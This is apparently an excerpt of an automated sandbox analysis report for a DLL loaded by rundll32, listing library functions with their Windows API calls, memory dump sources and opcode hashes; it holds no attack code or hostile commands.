                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                      • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                      • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                      • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                      • Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
                                                                                                                      • Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
                                                                                                                      • Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      • Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
                                                                                                                      • Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
                                                                                                                      • Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      • Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
                                                                                                                      • Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
                                                                                                                      • Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                      • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                      • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                      • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                      • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                      • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                      • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                      • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                      • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                      • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                      Download Yara Rule
